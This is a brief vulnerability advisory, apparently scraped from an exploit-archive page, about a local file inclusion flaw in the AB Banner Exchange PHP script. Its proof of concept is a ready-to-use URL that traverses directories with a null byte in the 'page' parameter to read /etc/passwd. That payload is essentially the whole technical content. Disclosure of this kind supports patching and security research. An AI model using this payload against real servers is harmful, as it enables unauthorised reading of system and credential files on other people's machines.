20 lines
No EOL
863 B
Text
20 lines
No EOL
863 B
Text
-----------------------------------------------------------
|
|
AB Banner Exchange (index.php page) Local file inclusion
|
|
Bug discovered by Yakir Wizman
|
|
Date 24/08/2012
|
|
Vendor Homepage - http://www.abscripts.com/ab-banner-exchange/
|
|
Demo - http://www.scripts-demo.com/ab-banner-exchange/
|
|
ISRAEL
|
|
-----------------------------------------------------------
|
|
Author will be not responsible for any damage.
|
|
-----------------------------------------------------------
|
|
|
|
About the Application
|
|
-----------------------------------------------------------
|
|
AB Banner Exchange is an advanced PHP script for running your own banner exchange system.
|
|
|
|
|
|
Proof Of Conecpt
|
|
-----------------------------------------------------------
|
|
Local file inclusion (Severity is high)
|
|
Vulnerable URL : http://server/ab-banner-exchange/index.php?page=../../../../../../../../../../etc/passwd%00 |